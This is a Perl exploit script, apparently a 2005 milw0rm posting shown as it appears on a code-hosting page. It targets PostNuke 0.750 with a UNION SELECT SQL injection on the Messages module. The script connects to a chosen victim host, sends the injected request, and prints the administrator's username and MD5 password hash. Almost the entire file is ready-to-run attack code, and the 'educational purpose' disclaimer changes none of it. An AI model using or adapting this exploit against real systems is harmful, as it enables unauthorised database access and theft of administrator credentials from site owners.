62 lines
No EOL
1.5 KiB
Perl
Executable file
62 lines
No EOL
1.5 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# This tools is only for educational purpose
|
|
#
|
|
# K-C0d3r a x0n3-h4ck friend !!!
|
|
#
|
|
# This exploit should give admin nick and md5 password
|
|
#
|
|
#-=[ PostNuke SQL Injection version : x=> 0.750]=-
|
|
#-=[ ]=-
|
|
#-=[ Discovered by sp3x ]=-
|
|
#-=[ Coded by K-C0d3r ]=-
|
|
#-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-
|
|
#
|
|
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
|
|
#
|
|
# !!! NOW IS PUBLIC (6-6-2005) !!!
|
|
|
|
use IO::Socket;
|
|
|
|
sub Usage {
|
|
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
|
|
exit;
|
|
}
|
|
|
|
if (@ARGV < 2)
|
|
{
|
|
Usage();
|
|
}
|
|
|
|
if (@ARGV > 2)
|
|
{
|
|
Usage();
|
|
}
|
|
|
|
if (@ARGV == 2)
|
|
{
|
|
$host = @ARGV[0];
|
|
$path = @ARGV[1];
|
|
|
|
print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
|
|
print "[+] Connecting to $host\n";
|
|
|
|
$injection = "$host\/$path?";
|
|
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
|
|
$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
|
|
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";
|
|
|
|
$socket = new IO::Socket::INET (PeerAddr => "$host",
|
|
PeerPort => 80,
|
|
Proto => 'tcp');
|
|
die unless $socket;
|
|
|
|
print "[+] Injecting command ...\n";
|
|
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
|
|
while (<$socket>)
|
|
{
|
|
print $_;
|
|
exit;
|
|
}
|
|
}
|
|
|
|
# milw0rm.com [2005-06-05] |